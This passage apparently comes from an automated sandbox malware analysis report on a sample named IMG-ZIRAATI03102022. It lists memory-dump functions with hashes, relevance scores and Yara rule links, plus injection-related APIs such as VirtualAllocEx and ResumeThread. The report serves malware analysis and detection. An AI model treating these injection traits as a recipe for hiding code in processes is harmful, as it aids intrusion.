                                                                                                                              Function 01220C20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01220C8E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 8881bab61e2db56007c92f72425da258352a1a83f005f874cefbfd160be1a057
                                                                                                                              • Instruction ID: 2dbb0b42deeac9ca43d885fe6c53ac23ce99d54e6e70e7ee6b3849afbff76a26
                                                                                                                              • Opcode Fuzzy Hash: 8881bab61e2db56007c92f72425da258352a1a83f005f874cefbfd160be1a057
                                                                                                                              • Instruction Fuzzy Hash: D11167718003099FDB10DFAAC844BEFBBF5EF88324F148819E515A7250C779A950CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01220A28 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.415723730.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1220000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: 4cf74bc051e61208b45b6e08d679a3cbaebb93d5291c8ff8b5cbdc5040972253
                                                                                                                              • Instruction ID: cd2dcc15cf233872c0d4e130964c1d70f07bb60aba2d99b787333fcd57871b40
                                                                                                                              • Opcode Fuzzy Hash: 4cf74bc051e61208b45b6e08d679a3cbaebb93d5291c8ff8b5cbdc5040972253
                                                                                                                              • Instruction Fuzzy Hash: 391166B1D003098FDB10DFAAC4447EEFBF4AB88324F548829D619A7240CB78A944CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060F1BD2 Relevance: 1.4, Instructions: 1387COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425304499.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_60f0000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d6065cbeeb82ea0c351b3baea72210436c47ec9198899cb37b611f44f410dc70
                                                                                                                              • Instruction ID: c06d7ba0d1b0ac2784525f8d8404d617c5f22a49b69197f9972d6bd909ea76be
                                                                                                                              • Opcode Fuzzy Hash: d6065cbeeb82ea0c351b3baea72210436c47ec9198899cb37b611f44f410dc70
                                                                                                                              • Instruction Fuzzy Hash: C4E12531E14255DFCB50DFA8C450ADEBFF6EF89200F158499E619ABB52CB31AC41CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067D08 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2
                                                                                                                              • API String ID: 0-450215437
                                                                                                                              • Opcode ID: 613304777935e48a7b70c7442f696ba7e182fe6a7c69753b46f93a4e90dc827a
                                                                                                                              • Instruction ID: 1d4d5100b95c31c538f1621466a7552ab32ed8ad0f46ad3ad6eb1982ea284156
                                                                                                                              • Opcode Fuzzy Hash: 613304777935e48a7b70c7442f696ba7e182fe6a7c69753b46f93a4e90dc827a
                                                                                                                              • Instruction Fuzzy Hash: 07313835E11208AFDF15DFA9E8949EEBBB5EF89314F10802AE905AB350DB319915CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06069700 Relevance: .5, Instructions: 547COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1eafe8fee153bf909e70785338bee404cc614041687b2b45330c76fd979c3c12
                                                                                                                              • Instruction ID: 15e28ffca6a8a38340e529fe0c663b50b91a8bdf98a1937eecf442ef1ba93c43
                                                                                                                              • Opcode Fuzzy Hash: 1eafe8fee153bf909e70785338bee404cc614041687b2b45330c76fd979c3c12
                                                                                                                              • Instruction Fuzzy Hash: A912C370B502128FCBA4DF69D45457DBFE5EF89224B1684AAE80BCB761CB34DC81CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606A850 Relevance: .4, Instructions: 356COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6f4e435bb94164318758d903820a926fb4732de46617285fd978a5b6d548bba9
                                                                                                                              • Instruction ID: 593f558aa9b43d50fc025781a7b0b67701e956095ae3e3077564bd176dc10dd4
                                                                                                                              • Opcode Fuzzy Hash: 6f4e435bb94164318758d903820a926fb4732de46617285fd978a5b6d548bba9
                                                                                                                              • Instruction Fuzzy Hash: 80E12C34F501199FDB94EFA9D494AAEBBF2AF48314F118469E906EB361DB30DC41CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060645D0 Relevance: .3, Instructions: 299COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 750b91ab5a0339f6151285a9060437f8d1b59a312333c421115eb6d4301b4b48
                                                                                                                              • Instruction ID: 6a9e2ae141ce89e8b395053620ff650ca9aceda055601f004a248f106839abb8
                                                                                                                              • Opcode Fuzzy Hash: 750b91ab5a0339f6151285a9060437f8d1b59a312333c421115eb6d4301b4b48
                                                                                                                              • Instruction Fuzzy Hash: E3B1FE30B0420A9FCB44DF68C494AAEBBF6FF88314F208569E905AB354CB71ED45CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06062928 Relevance: .3, Instructions: 296COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 32a74999d17adee91239f4f2d8a387901f2b90c20a9952aa49e40b2491037171
                                                                                                                              • Instruction ID: 0a8e10c49b4f105f77542f3a949e7da0cb3bfae3b1343a6af730ec1d92343965
                                                                                                                              • Opcode Fuzzy Hash: 32a74999d17adee91239f4f2d8a387901f2b90c20a9952aa49e40b2491037171
                                                                                                                              • Instruction Fuzzy Hash: F6B16C30E4411A9FCF91CFAAD9809AEBBF6FF84314F15856AE455E7241C730EA41CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060671E0 Relevance: .3, Instructions: 295COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5d795ad1c478214e05dd7df69798e4f56e8222619da4163996920c679651ccb2
                                                                                                                              • Instruction ID: 6c6d8403ad1c64f2c9bde9f4bd0f6ecf435fa0f4706c5411507bdce082f6705e
                                                                                                                              • Opcode Fuzzy Hash: 5d795ad1c478214e05dd7df69798e4f56e8222619da4163996920c679651ccb2
                                                                                                                              • Instruction Fuzzy Hash: B9B1DF30A00216CFC795DF69D4409AEBFF1FF85318B1585A9E41AAB342D735EC89CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606DD98 Relevance: .3, Instructions: 283COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 22ad5d853d61bd94d72c258fe5edbc4d38bad824d06bc289589f47eabc2d5f57
                                                                                                                              • Instruction ID: 45b75f12d167bda49dbb8ad0288f8f1230be2d559a1e212c432be7b1ec6904d1
                                                                                                                              • Opcode Fuzzy Hash: 22ad5d853d61bd94d72c258fe5edbc4d38bad824d06bc289589f47eabc2d5f57
                                                                                                                              • Instruction Fuzzy Hash: 7E9194357846118FDBD9AB3AC864A7E7FE7AFC511471A80A9E406CB3A1DE30DC41C792
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060F16C8 Relevance: .3, Instructions: 272COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425304499.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_60f0000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a738455627b263dd092f94df22795da95f1ec401200aef4ae9237fbe5e27f8b3
                                                                                                                              • Instruction ID: b1b59c743afc0c459160482ccee18a5b7e1b6ec48ff1710d49e50dfded668b76
                                                                                                                              • Opcode Fuzzy Hash: a738455627b263dd092f94df22795da95f1ec401200aef4ae9237fbe5e27f8b3
                                                                                                                              • Instruction Fuzzy Hash: 3F914B31E5D391CFC7A5CB70D8106AABFF29F86210B1A81EBC1489B652CB359C45C7E1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060611C8 Relevance: .3, Instructions: 262COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d325dd4322bcd3d1be49135076b1a8a493e45c0ce8ad2cbef5b3cd1a099470f8
                                                                                                                              • Instruction ID: 8f6a39626031ff3c50d0c664abbcf71c0b06e8c3f11bc28eecd088bcd16f1790
                                                                                                                              • Opcode Fuzzy Hash: d325dd4322bcd3d1be49135076b1a8a493e45c0ce8ad2cbef5b3cd1a099470f8
                                                                                                                              • Instruction Fuzzy Hash: 53B12675A006058FCB54CFA9D58499AFBF2FF88314B248AA9E459DB362D730EC45CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06060CA8 Relevance: .3, Instructions: 252COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 68b8b98273fa0bb7e34e82abd46460584c34aace829472ad1f420204dc4d403f
                                                                                                                              • Instruction ID: 0ebbc36b5b22ab7b36620eb89b14a8e064d14a8364c5a356382f04e59436be0b
                                                                                                                              • Opcode Fuzzy Hash: 68b8b98273fa0bb7e34e82abd46460584c34aace829472ad1f420204dc4d403f
                                                                                                                              • Instruction Fuzzy Hash: 909101317442149FCB51DFA9C940AAEBBF6FF89314B14856AE50ADB351DB30EC05CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067888 Relevance: .2, Instructions: 246COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7c6fe01d3f9908e7db4f0e885b84c8180e58cdb7044639ffd030fb40037afa58
                                                                                                                              • Instruction ID: 56a44969dd07e3be02138c85ef51fd6ff6f2afacb2a64cdc2d0d9f00ccb02ab7
                                                                                                                              • Opcode Fuzzy Hash: 7c6fe01d3f9908e7db4f0e885b84c8180e58cdb7044639ffd030fb40037afa58
                                                                                                                              • Instruction Fuzzy Hash: 91A18F30E40209DFDB54DFA5C455BAEBBF2AF88718F158058E506AF3A5CB749D81CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060651A8 Relevance: .2, Instructions: 243COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5bf4cc873b6b05df122f61df817af7dc691d1697e808728c6963d9b69a8f4bfc
                                                                                                                              • Instruction ID: c3bffcee1cf9f56455e198977dc1a258d2c609a4354eb8d7b8e35b67663bfdd8
                                                                                                                              • Opcode Fuzzy Hash: 5bf4cc873b6b05df122f61df817af7dc691d1697e808728c6963d9b69a8f4bfc
                                                                                                                              • Instruction Fuzzy Hash: 8E91AF34A402158FCBC5EF79C4907BEBBE2AF84214F19C55CD11AAB391DB749C498BA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06066078 Relevance: .2, Instructions: 235COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5fe4f0d9eef5182798d73f074028f87e86a748e97b72ec08b8e5d864ac23ff2d
                                                                                                                              • Instruction ID: 82df97bdb145935eed004bb7a6841cf06b88b8e9a2415e8674efa533664b0fa1
                                                                                                                              • Opcode Fuzzy Hash: 5fe4f0d9eef5182798d73f074028f87e86a748e97b72ec08b8e5d864ac23ff2d
                                                                                                                              • Instruction Fuzzy Hash: 12916E30B506198FCB54DFA9C894AAEBBF5FF88204F158069E505AB361DB32EC45CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606A84D Relevance: .2, Instructions: 234COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b5928f575355fa405e0ae4ab9ff711808fd390ea6a04e6c5067856ea748e3007
                                                                                                                              • Instruction ID: ba2fc150f0d5631c587e25901c51609f271a2e2d3a6730a25d1543a8575f3124
                                                                                                                              • Opcode Fuzzy Hash: b5928f575355fa405e0ae4ab9ff711808fd390ea6a04e6c5067856ea748e3007
                                                                                                                              • Instruction Fuzzy Hash: B5A10A34F501189FDB98DF69D894A9EBBF2EF88314F158069E406AB361DB30EC41CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06066740 Relevance: .2, Instructions: 219COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 861399d47a8b9cca3f98c7d5a229a0369992f7e294fe4e10f9efeba1c45e3d86
                                                                                                                              • Instruction ID: 335267e8bce6b2b167bb61a5acb4a7c1b4eb9c5141f85679f9dbd1663a5dd8c4
                                                                                                                              • Opcode Fuzzy Hash: 861399d47a8b9cca3f98c7d5a229a0369992f7e294fe4e10f9efeba1c45e3d86
                                                                                                                              • Instruction Fuzzy Hash: F381D4309A0136DFD7949BA5C0142BD7EF5FB84344F16C558D90BAB3A0DB365C88CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06061A38 Relevance: .2, Instructions: 183COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 85cd8abfcdf5f514edad0fd17db29c853589b76011694f1017dc6080eed6969c
                                                                                                                              • Instruction ID: f533c0e3b0ea608d36ad6bb1277e92eeb858c9fed2944d715af36d8a3ccade05
                                                                                                                              • Opcode Fuzzy Hash: 85cd8abfcdf5f514edad0fd17db29c853589b76011694f1017dc6080eed6969c
                                                                                                                              • Instruction Fuzzy Hash: B351F536A002049FCB11CFA9D844AAF7FF6EF89210F15806AF50AD7661D7359C16CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06061830 Relevance: .2, Instructions: 177COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f1fb3addaf5a7c4c85855a7df2d108b060bdb0c53fe7138845ed2211b00f2c97
                                                                                                                              • Instruction ID: 002bda7cfb318ea2f372aa94f05a376e72d0f1244c4c4d929a1a34f4fc00e6d0
                                                                                                                              • Opcode Fuzzy Hash: f1fb3addaf5a7c4c85855a7df2d108b060bdb0c53fe7138845ed2211b00f2c97
                                                                                                                              • Instruction Fuzzy Hash: 9C61E031A046549FDBA1CF79C484AAFBFF6EF85218F04489DE5468B650CB70F846CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060644C2 Relevance: .2, Instructions: 164COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e3cdb516e8e95f3d5a63396b79cd20355fbe7ffa7b4534534b1eccc4dca8be30
                                                                                                                              • Instruction ID: 2bc04ac2b73c2b7d7a203693bb0fb47db009fba8be633a74aac05cdb30f811e1
                                                                                                                              • Opcode Fuzzy Hash: e3cdb516e8e95f3d5a63396b79cd20355fbe7ffa7b4534534b1eccc4dca8be30
                                                                                                                              • Instruction Fuzzy Hash: FB51F230A443469FCB51CF69C8909ABBFF5FF42214B05C56AF859CB252D730E944CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06060788 Relevance: .2, Instructions: 159COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6dc914c53c60d21589161f7ad90db46ef85cfcfc7c0982afea30ba04bd9ac9bc
                                                                                                                              • Instruction ID: e79d66f2b417f509d47ec3e83724ead444ac643bab82876583c24ec2f52d8697
                                                                                                                              • Opcode Fuzzy Hash: 6dc914c53c60d21589161f7ad90db46ef85cfcfc7c0982afea30ba04bd9ac9bc
                                                                                                                              • Instruction Fuzzy Hash: 74511131A452528FC746DB79C95486DBFF0EF4661470981AAE05ACB7B2C734AC06CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606B290 Relevance: .1, Instructions: 141COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 94eb56cde51e657e4723ac9b89fccb773c592c0232010561d112e466efa244a3
                                                                                                                              • Instruction ID: e9f2e29fd39d0a10e967b2a28af751c348163ac95fc375aa3763ecdec697d586
                                                                                                                              • Opcode Fuzzy Hash: 94eb56cde51e657e4723ac9b89fccb773c592c0232010561d112e466efa244a3
                                                                                                                              • Instruction Fuzzy Hash: 23412932B442218FD7649B7AD854B2A7BE6AFC6610F158076F60ACF3A1DB70DC11C7A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060F1D3B Relevance: .1, Instructions: 135COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425304499.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_60f0000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4cd527febb5266416ee86e9c6e5357403922f607af303c345ff960c312505547
                                                                                                                              • Instruction ID: 750729f7429ac050cffe8c62a09b4d5c9687b1565fa5cdfcb453baf84dd38c96
                                                                                                                              • Opcode Fuzzy Hash: 4cd527febb5266416ee86e9c6e5357403922f607af303c345ff960c312505547
                                                                                                                              • Instruction Fuzzy Hash: 7C51D134E14215DFCB94CF58D481AEEBBF6AF49210F1580A9FA19ABB51CB31AC41CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060F1F02 Relevance: .1, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425304499.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_60f0000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5b91b0a45d762a3d193fb553a7a71befbf7867881fb54b070ad548a74887ab8b
                                                                                                                              • Instruction ID: 0b7455a3f08960b4eaf4d0c6fbfba88d83bed34fca52637d477736f31db3625e
                                                                                                                              • Opcode Fuzzy Hash: 5b91b0a45d762a3d193fb553a7a71befbf7867881fb54b070ad548a74887ab8b
                                                                                                                              • Instruction Fuzzy Hash: C3410535E50214DFC790DF98D491ADEBFF6EF49200F21809AEA15ABB52CB729C81CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060647D0 Relevance: .1, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f96eaa7cec551646f0186fe3af93f57475800b69b4e27f8349b976f2f386ba78
                                                                                                                              • Instruction ID: 1d309aa64ac4480421430a9da0d7ee059b08e9457d8f77769af7de5c287d6e70
                                                                                                                              • Opcode Fuzzy Hash: f96eaa7cec551646f0186fe3af93f57475800b69b4e27f8349b976f2f386ba78
                                                                                                                              • Instruction Fuzzy Hash: 12512930A002098FDB44DF69D588ADEBBF2FF88304F218599E505AB365CB71AD45CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06064320 Relevance: .1, Instructions: 120COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
